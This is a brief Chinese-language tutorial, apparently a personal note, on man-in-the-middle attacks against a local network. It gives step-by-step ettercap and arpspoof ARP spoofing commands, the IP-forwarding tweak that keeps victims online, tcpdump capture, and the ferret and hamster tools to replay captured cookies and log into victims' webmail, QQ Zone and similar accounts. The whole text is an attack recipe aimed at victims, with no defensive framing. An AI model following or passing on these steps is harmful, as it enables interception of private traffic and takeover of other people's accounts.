一、开启ettercap
ettercap -G 图像界面操作
- 打开ettercap,选择自己的网卡
- Scan host
- Hostlist 选择网关 目标
- 选择arpsniffer模式
- 开启start
- 选择view选项的connections
- 查看connection data 找到有用数据
将想要欺骗的网关和受害者分别添加到"add to target 1"和"add to target 2"。
二、或者arpspoof 进行arp欺骗(ettercap经常报错ERROR 12 Cannot allocate memory,不知道怎么解决哪位大神指教一下,求教)
命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
必须另外开启终端echo 1>/proc/sys/net/ipv4/ip_forward进行IP流量转发,不然被攻击者无法上网
受害主机前后MAC地址对比
打开一个命令行终端,输入driftnet -i wlan0 测试下arp欺骗正常没
TcpDump可以将网络中传送的数据包完全截获下来提供分析,捕获数据包命令,重新开启一个命令行
tcpdump -i wlan0 -w text1.cap
让受害者打开个邮箱或者微博等,不要关闭此命令行会一直监听数据,再打开新命令行
ferret -r text1.cap
处理text1.cap数据,如果重新获取新的会话重新执行此命令即可。然后在本命令行输入:hamster
hamster:基于无线网络通过ferret抓包实现对Gmail等邮箱的劫持(sidejacking)打开配置火狐浏览器的对应端口 打开Preferences->Advanced->Network->Settings->Manual proxy
然后设置下 127.0.0.1 端口1234 浏览器浏览http://hamster
点击打开即可直接登陆,比如qq空间 http://user.qzone.qq.com/136349117 不要打开那些资源文件链接,类似这样的无后缀,亲测百度新闻、qq空间可以劫持
参考 http://www.freebuf.com/sectool/39050.html